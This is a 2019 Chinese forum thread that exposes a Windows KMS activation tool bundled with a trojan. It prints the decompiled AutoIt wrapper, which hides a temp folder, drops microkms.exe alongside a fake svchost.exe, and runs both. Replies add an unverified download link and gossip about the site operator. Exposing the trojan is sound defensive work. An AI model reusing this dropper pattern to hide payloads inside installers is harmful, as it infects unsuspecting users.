病毒帖【最干净的windows系统激活】的分析与猜测

2012jiashanni · 发表于 2019-5-18 00:00:52

本帖最后由 2012jiashanni 于 2019-5-18 00:52 编辑

原贴:http://wuyou.net/forum.php?mod=v ... tra=page%3D1&page=1

通过分析,发现这个程序是AU3编译的压缩包

程序反编译后的源码显示

就是把一个名为 microkms.exe 的激活工具与 svchost.exe [目测病毒] 释放到临时目录  %TEMP%\TEMP 并设置这个目录隐藏
然后分别运行这两个程序

程序信息显示两个程序为同一个开发者

我猜报木马就是 svchost.exe 导致的
这也是目前小部分激活工具发布者通常会做的一个手法,通过第三方定制或自行开发,并捆绑木马,多半目的是劫持浏览器主页/捆绑软件/其他目的

目测这个 microkms.exe  是安全的为什么我猜microkms.exe  是安全的,因为他这个很明显是第三方定制的,如果是他自行开发或在定制的时候要求加入木马,完全用不到AU3二次打包进木马,直接内置在程序里就可以了,多半是开发这个激活工具的人没写入木马或者他意外得到这分源码但是只会改作者信息，所以只能AU3二次打包

当然也可能是第三方人嫁祸,重点在于  最干净的windows系统激活这个帖子里的百度云下载过来的是的确有病毒的

这是 microkms.exe  的查毒报告，
https://habo.qq.com/file/showdetail?pk=ADcGZl1rB2QIP1s4U2Y%3D

可能这个发布者是想把正常能激活的工具与木马捆绑一起来达到增加收入的目的
这个网站发的激活工具  在网络上可查询到的是已经有人很早就反馈有病毒了
重点提醒这个帖子里的工具不是误报是真的有毒

反编译的AU3源码

#NoTrayIcon
#AutoIt3Wrapper_Icon=C:\Documents and Settings\Administrator\桌面\microkms.exe
#AutoIt3Wrapper_Res_Comment=在线KMS激活服务
#AutoIt3Wrapper_Res_Description=在线KMS激活服务
#AutoIt3Wrapper_Res_Fileversion=19.01.18.0
#AutoIt3Wrapper_Res_ProductVersion=19.01.18.0
#AutoIt3Wrapper_Res_Language=
#AutoIt3Wrapper_Res_LegalCopyright=www.yishimei.cn
DirCreate(@TempDir & "\temp")
DirCreate(@TempDir & "\temp")
DirCreate(@TempDir & "\temp")
FileSetAttrib(@TempDir & "\temp", "+S+H")
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\microkms.exe", @TempDir & "\temp\microkms.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\svchost.exe", @TempDir & "\temp\svchost.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\microkms.exe", @TempDir & "\temp\microkms.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\svchost.exe", @TempDir & "\temp\svchost.exe", 0)
Sleep(10)
Run(@TempDir & "\temp\microkms.exe", @TempDir & "\temp", @SW_SHOW)
Run(@TempDir & "\temp\svchost.exe", @TempDir & "\temp", @SW_SHOW)

2012jiashanni · 发表于 2019-5-18 00:12:53

对了这个木马的传播范围有点广

另外他这个网站好像是个女的在运营反正支付宝叫什么小燕的

2012jiashanni · 发表于 2019-5-18 00:29:39

danmo 发表于 2019-5-18 00:21
MicroKMS 神龙版本来就是亦是美的站长写的啊，其中激活用的KMS服务端搭建在他服务器上。

你感觉这个帖子的重点是工具谁开发的吗

2012jiashanni · 发表于 2019-5-18 00:46:50

本帖最后由 2012jiashanni 于 2019-5-18 00:48 编辑

danmo 发表于 2019-5-18 00:36
参考下小马激活工具的发展，感觉是和开发者自身利益有关系的。他自己内置到软件里面，吃相就难看了，一 ...

跟发展没关系的吧他们只是想疯狂的赚钱为目的而不是为了发展和维持
增加收入的渠道很多而不是捆绑木马这种肮脏手段
我网站也遇到过资金问题,我一开始做纯净的,每个月自己投钱进去,
收入靠微薄的捐助,后来还是有大佬捐助服务器了,才勉强撑了一年,难道我
当初发展困难我就可以在用户不知情的情况下去捆绑木马吗？？？
如果这个工具第一发布者是为了维持/发展/分享,他会在主页以提示框/勾选框/按钮等方式来让用户可选择

说到底这个工具第一个发布者不是为了发展/维持/分享,他只是单纯的赚钱而已

2012jiashanni · 发表于 2019-5-18 00:50:29

令狐大虾发表于 2019-5-18 00:49
我需要楼主的反编译软件谢谢哈。

我群文件有加群我官网有 www.51cxsoft.com

2012jiashanni · 发表于 2019-5-20 13:28:31

brook 发表于 2019-5-20 12:39
链接：https://pan.baidu.com/s/1GAZnbmyK7VohBrilOpitRw
提取码：7uep

这个跟我帖子里破解出来的 microkms.exe 应该是相同不带毒的

2012jiashanni · 发表于 2019-5-20 21:52:11

2012zhiwen 发表于 2019-5-20 21:15
想问下，，这个病毒有什么作用呢，能引起什么后果呢

一般来说就是锁定主页强推流氓软件有些就会窃取隐私往你系统里注入其他木马

		自动登录	找回密码
密码			注册

[原创] 病毒帖【最干净的windows系统激活】的分析与猜测

评分

点评

点评

点评

点评